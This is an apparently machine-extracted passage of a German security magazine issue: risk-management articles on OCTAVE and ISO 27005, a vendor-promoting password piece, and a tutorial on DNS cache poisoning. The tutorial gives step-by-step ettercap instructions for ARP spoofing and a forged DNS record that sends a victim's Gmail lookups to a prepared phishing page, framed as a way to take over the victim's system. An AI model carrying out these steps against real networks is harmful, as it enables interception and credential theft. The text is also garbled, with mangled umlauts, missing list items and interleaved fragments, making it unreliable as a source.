organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
